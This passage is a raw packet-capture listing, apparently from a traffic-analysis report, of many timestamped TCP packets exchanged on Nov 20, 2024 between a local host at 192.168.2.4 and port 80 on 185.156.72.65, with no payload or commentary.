                                                                Nov 20, 2024 05:02:20.047935963 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.047997952 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.048036098 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.048038006 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.048048973 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.048073053 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.048084021 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.048129082 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.048139095 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.048149109 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.048158884 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.048166990 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.048170090 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.048194885 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.048209906 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.048226118 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.048238039 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.048254013 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.048263073 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.048265934 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.048273087 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.048284054 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.048294067 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.048301935 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.048305035 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.048331022 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.048340082 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.048368931 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.048412085 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.048520088 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.515152931 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.515158892 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.515170097 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.515182018 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.515182018 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.515192986 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.515202999 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.515211105 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.515221119 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.515224934 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.515232086 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.515242100 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.515244961 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.515255928 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.515264988 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.515265942 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.515275002 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.515286922 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.515289068 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.515296936 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.515299082 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.515310049 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.515324116 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.515333891 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.515340090 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.515340090 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.515352964 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.515355110 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.515368938 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.515379906 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.515379906 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.515388012 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.515391111 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.515399933 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.515402079 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.515412092 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.515420914 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.515422106 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.515434027 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.515444040 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.515445948 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.515454054 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.515455008 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.515465021 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.515475035 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.515477896 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.515486002 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.515496016 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.515500069 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.515506983 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.515507936 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.515517950 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.515530109 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.515533924 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.515544891 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.515554905 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.515556097 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.515564919 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.515564919 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.515574932 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.515583992 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.515589952 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.515595913 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.515607119 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.515614033 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.515618086 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.515624046 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.515628099 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.515638113 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.515646935 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.515654087 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.515657902 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.515671968 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.515674114 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.515681982 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.515682936 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.515692949 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.515705109 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.515705109 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.515713930 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.515724897 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.515729904 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.515734911 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.515741110 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.515748978 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.515754938 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.515759945 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.515763998 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.515764952 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.515769958 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.515779972 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.515784979 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.515790939 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.515801907 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.515811920 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.515813112 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.515820980 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.515822887 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.515830994 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.515831947 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.515856028 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.515858889 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.515870094 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.515880108 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.515880108 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.515891075 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.515898943 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.515923023 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.516217947 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.516252995 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.516339064 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.516349077 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.516360044 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.516369104 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.516370058 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.516379118 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.516380072 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.516388893 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.516400099 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.516402960 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.516412973 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.516419888 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.516449928 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.516478062 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.516489983 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.516499996 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.516510010 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.516520023 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.516520023 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.516529083 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.516561031 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.516597986 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.516609907 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.516618013 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.516628027 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.516637087 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.516647100 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.516658068 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.516664982 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.516665936 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.516674042 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.516686916 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.516689062 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.516689062 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.516704082 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.516727924 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.516757011 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.516768932 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.516777992 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.516788960 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.516791105 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.516798973 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.516801119 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.516808987 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.516819000 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.516824007 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.516829014 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.516839981 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.516849041 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.516849995 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.516856909 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.516859055 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.516868114 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.516874075 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.516877890 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.516885042 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.516896963 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.516906023 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.516917944 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.516927958 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.516932011 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.516937971 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.516942978 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.516948938 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.516954899 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.516966105 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.516972065 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.516976118 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.516980886 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.516985893 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.516993046 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.516994953 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.517004967 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.517005920 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.517014027 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.517024994 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.517033100 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.517035007 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.517043114 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.517052889 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.517065048 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.517074108 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.517074108 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.517087936 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.517117023 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.517477036 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.517493010 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.517503977 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.517512083 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.517520905 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.517529964 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.517529964 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.517532110 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.517539978 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.517544985 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.517554045 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.517565012 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.517568111 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.517576933 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.517591000 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.517745972 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.517756939 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.517766953 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839418888 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839426041 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.839430094 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839440107 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839443922 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.839451075 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839461088 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839463949 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.839472055 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839478016 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.839502096 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.839508057 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839519024 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839526892 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.839529037 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839540005 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839549065 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839550972 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.839559078 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839570045 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839580059 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839581013 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.839591026 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839598894 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.839601040 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839612007 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839617968 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.839622021 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839631081 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839634895 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.839641094 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839662075 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839678049 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839680910 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.839680910 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.839689970 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839700937 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839701891 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.839710951 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839720964 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.839723110 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839728117 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839739084 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839739084 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.839747906 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839757919 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839767933 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839767933 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.839776039 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839786053 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839787960 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.839797020 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839808941 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839812994 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.839812994 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.839828014 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839834929 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.839847088 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839859962 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839868069 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.839869022 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839879990 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839884996 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.839890957 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839900970 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839909077 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839914083 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.839919090 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839930058 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839932919 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.839940071 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839948893 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.839952946 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839962959 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839966059 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.839973927 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.839984894 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.839984894 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840007067 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840007067 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.840024948 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840035915 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840039968 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.840039968 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.840044975 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840064049 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.840065002 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840075016 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840084076 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840092897 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.840092897 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840102911 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840112925 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840122938 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840122938 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.840133905 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840143919 CET8049730185.156.72.65192.168.2.4
